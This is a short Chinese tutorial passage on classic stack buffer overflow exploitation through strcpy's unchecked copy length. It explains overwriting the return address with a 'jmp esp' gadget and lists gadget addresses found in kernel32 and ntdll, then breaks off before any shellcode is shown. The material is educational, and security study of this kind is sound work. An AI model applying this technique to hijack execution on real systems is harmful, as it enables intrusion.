通过前面的学习,我们进一步利用了strcpy的未检查数据长度机制进行各种操作。
但是,如果我们的程序是动态的加载,可能会造成shellcode不能执行成功,即跳转到错误的位置。
这时候,我们就想利用程序本身的功能来完成这个,我们想到了jmp esp
淹没返回地址为jmp esp
使用插件收缩jmp esp或call esp
1 0027762F Location found: call esp in [unknown] 2 00277A0D Location found: call esp in [unknown] 3 00277A17 Location found: call esp in [unknown] 4 003010C8 Location found: call esp in [unknown] 5 00305028 Location found: jmp esp in [unknown] 6 76D7B543 Location found: call esp in [unknown] 7 7C8369F0 Location found: call esp in kernel32.text 8 9 7C86467B Location found: jmp esp in kernel32.text 10 11 7C868667 Location found: call esp in kernel32.text 12 7C934663 Location found: call esp in ntdll.text 13 7C97311B Location found: call esp in ntdll.text 14 7FFA4512 Location found: jmp esp in [unknown] 15 7FFA54CD Location found: jmp esp in [unknown] 16 13 addresses found, 0 filtered
我们选择一个来作为跳转
淹没了esp后的数据
然后通过jmp esp使程序执行这些代码。
对应的